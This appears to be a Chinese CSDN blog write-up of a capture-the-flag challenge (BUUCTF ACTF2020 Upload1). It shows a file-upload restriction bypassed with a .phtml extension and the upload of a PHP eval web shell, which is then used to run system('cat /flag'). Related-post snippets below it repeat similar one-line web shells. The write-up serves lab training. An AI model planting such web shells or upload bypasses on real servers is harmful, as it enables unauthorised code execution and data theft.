BUUCTF-[ACTF2020 新生赛]Upload1

最新推荐文章于 2024-04-16 15:07:58 发布
最新推荐文章于 2024-04-16 15:07:58 发布
阅读量1.6k 收藏 6
点赞数 4
分类专栏: BUUCTF 文章标签: 安全漏洞 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/120423203
版权

目录

题目: 

分析:

题目: 

 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞

分析:

先随便上传一个文件,发现提示

 并且bp抓包并没有抓到包,说明为前端检测过滤。

那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。

先上传一个jpg文件,内容为<?php phpinfo();?>。

 发现后端还是进行了检查过滤

那就试试其他几种后缀:

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht,这些后缀名都可以被当做php文件执行(需要配置文件里面的支持)

1、例如Apache的 httpd.conf 中有如下配置代码:

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

2、或者.htaccess文件内容:

SetHandler application/x-httpd-php

意思是设置当前所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范,就会被当做PHP执行。不符合则报错。

phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析

PHT文件是一个HTML页面,其中包括一个PHP脚本

 发现只有phtml满足绕过并且能够执行php代码

 访问这个文件

成功执行。

将将文件内容改成<?php eval($_POST[1]);?>重新上传

 访问文件,post传入:1=system('cat /flag');

 

这题不能上传.htaccess文件,因为上传文件后会修改文件名。

_Monica_
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 133
本题考察文件上传前端校验以及.phtml的用法
[ACTF2020 新生]Upload 1
weixin_63139305的博客
05-04 221
这是一道比较简单的文件上传,我直接一次就做出来了。[ACTF2020 新生]Upload
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 393
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF-Web[ACTF2020 新生]Upload
rumil的博客
06-24 2200
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
buuctf-web-[ACTF2020 新生]Upload1
mlws1900的博客
08-03 286
或者查看源代码,可以找到上传的地方。随机点一下,发现了可以点亮这个灯。可以上传jpg,但是没法解析。抓包修改后缀名phtml上传。咋flag都喜欢放根目录。
buuctf[ACTF2020 新生]Upload 1
qq_53175607的博客
12-06 639
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
BUUCTF-web-[ACTF2020 新生]Upload 1
qq_47271638的博客
06-22 466
打开靶场 发现网页设计很好看突然就觉得今天挺不错的这可能就是有感而生吧 尝试着上传png文件和php文件 发现png文件上传成功;开始上传php文件 php文件被拦截而且是弹窗拦截初步估计是被前端代码给拦截了前端代码设计了白名单吧 接着用burp抓包然后修改png文件为php文件绕过前端的白名单 同样被检测到了尝试是哪种检测 上传php3,php4,php5以及phtml文件后缀或者在php文件后面加上“ ”空格符绕过检查 或者“.”加点绕过和大小写绕过或者上.htaccess文件将png格式当做ph
web buuctf [ACTF2020 新生]Upload1
weixin_44214568的博客
09-05 323
其实这一题是我在极客大挑战upload后做的,所以直接上传了之前的一句话木马,用蚁剑连了之后,就直接做出来了。我重新做了一下这道题,解题目流程: 1.随便上传了一个txt文档,提示上传jpg、png格式的,弹出的是个脚本,可能前端有过滤, f12看前端代码 删掉前端代码 上传成功了,这样前端可以绕过了 2.上传一句话木马(用能执行php代码的格式) 提示: 说明后端也有过滤,这个我尝试了一下格式:php4 也不行,试试phtml payload: <...
buuctf-[ACTF2020 新生]Upload(小宇特详解)
小宇的web博客
01-15 2853
buuctf-[ACTF2020 新生]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
BUUCTF [ACTF2020 新生]Upload
weixin_73399382的博客
04-16 180
发现一大堆都上传成功了,我们随便选一个放包吧,我经常用phtml所以就选这个了(当一个文件的扩展名为".phtml"时,服务器会将其视为包含PHP代码的文件,并通过PHP解析器来执行其中的代码)丢到攻击器使用后缀名字典爆破一下看看有没有遗漏没过滤的。发现只能上传jpg,png,gif格式图片。先直接上传一句话木马看看有没有过滤规则。将文件后缀名修改为jpg上传,bp抓包。将路径拼接到url里面成功访问。上传成功,路径也显示出来了。鼠标悬停发现文件上传点。根目录下看到flag。
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
1. **矩阵运算**:MATLAB的基础是矩阵,它支持各种矩阵运算,如加法、减法、乘法、除法、转置、逆矩阵、求解线性方程组等。实例可能包括创建不同类型的矩阵(对角矩阵、单位矩阵、稀疏矩阵等),以及进行矩阵运算的...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件演示版使用CocoaPods进行安装播客文件Podfile添加到您的Podfile : pod 'PPJEmailPicker'用法以编程方式第1步-导入标题# import " PPJEmailPicker.h "第2步-创建...
NTFS文件系统分析
09-19
#### 1. 引言 NTFS(New Technology File System)是微软公司开发的一种先进的文件系统,旨在提供更好的容错性和安全性。随着Windows操作系统的不断演进,NTFS已经成为Windows NT系列操作系统(包括Windows NT 4.0...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8353
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
[ACTF2020 新生]BackupFile 1
07-25
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道题目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用dirsearch工具进行目录扫描,找到备份文件的位置。然后访问该链接,下载文件并打开查看。在这个题目中,打开的是一个PHP文件,其中包含了一个弱类型比较的逻辑。通过让key=123进行访问,可以看到flag。\[1\] 源码中的逻辑是,如果存在$_GET\['key'\],则将其赋值给$key。如果$key不是一个数字,则输出"Just num!"。然后将$key转化为整数,并与字符串$str进行比较。如果相等,则输出$flag。否则,输出"Try to find out source file!"。\[2\]\[3\] #### 引用[.reference_title] - *1* [[ACTF2020 新生]BackupFile 1](https://blog.csdn.net/qq_44122254/article/details/125927517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[ACTF2020 新生]BackupFile1](https://blog.csdn.net/m0_73728268/article/details/129497240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUUCTF-[ACTF2020 新生]BackupFile1](https://blog.csdn.net/qq_46918279/article/details/120619373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值